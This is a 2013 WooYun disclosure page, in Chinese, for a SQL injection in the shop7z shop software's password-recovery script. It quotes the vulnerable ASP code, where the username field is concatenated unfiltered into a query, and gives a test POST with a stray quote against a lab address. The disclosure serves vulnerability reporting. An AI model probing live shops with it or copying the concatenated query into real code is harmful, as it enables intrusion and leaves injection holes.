当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042080

漏洞标题:shop7z sql注入漏洞

相关厂商:shop7z

漏洞作者: Matt

提交时间:2013-11-07 12:12

修复时间:2014-02-05 12:12

公开时间:2014-02-05 12:12

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-02-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

shop7z sql注入漏洞

详细说明:

getpassword3.asp

if session("verifycode")<>request.Form("code") then
response.write "<br><br><div align=center><a href=javascript:window.history.back()>请输入正确的验证码,点击这里返回重试</a></div>"
response.end
end if
username=trim(request.Form("username"))
password_Answer=trim(request.Form("password_Answer"))
mail=trim(request.Form("mail"))
if InStr(password_Answer,"'")>0 or InStr(password_Answer,"--")>0 or InStr(password_Answer,"(")>0 or InStr(password_Answer,";")>0 then
response.write "密码提示答案不合法。"
response.end
END IF
if InStr(mail,"'")>0 or InStr(mail,"(")>0 or InStr(mail,";")>0 then
response.write "mail不合法。"
response.end
END IF
sql="select password from x_huiyuan where username='"&username&"' and password_Answer='"&password_Answer&"' and email='"&mail&"' "//注入
set rs=server.createobject("adodb.recordset")
rs.open sql,conn,1,1


测试
192.168.236.131/getpassword3.asp
POST 内容
username=1111'&password_Answer=111&[email protected]

漏洞证明:

QQ截图20131103142126.png

修复方案:

过滤

版权声明:转载请注明来源 Matt@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝